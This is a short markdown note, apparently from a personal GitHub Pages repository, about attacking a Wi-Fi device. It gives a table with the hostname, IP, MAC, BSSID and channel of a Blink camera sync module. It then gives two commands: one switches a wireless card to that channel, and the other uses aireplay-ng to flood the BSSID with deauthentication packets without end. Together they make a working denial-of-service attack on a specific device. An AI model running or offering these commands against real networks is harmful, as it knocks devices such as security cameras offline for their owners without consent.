Tech-Bandit/tech-bandit.github.io/Airmon-ng_Used.md

 | HOSTNAME| IP|MAC |  BSSID | CH |
 | ---- | ----- | ----| ---| --- |
 |blink-sync-module | 192.168.1.154| 74:EC:B2:41:4B:61| E8:9F:80:12:5C:77 | 11 |

+### Attack target
+1. Switch channel `sudo iwconfig wlan0 channel 11`
+2. Send Deauth packets `sudo aireplay-ng -0 0 -a E8:9F:80:12:5C:77 wlan0`
+> This will continuasly block the packets using the '0' argument but we can set a timer for how many packets are being sent.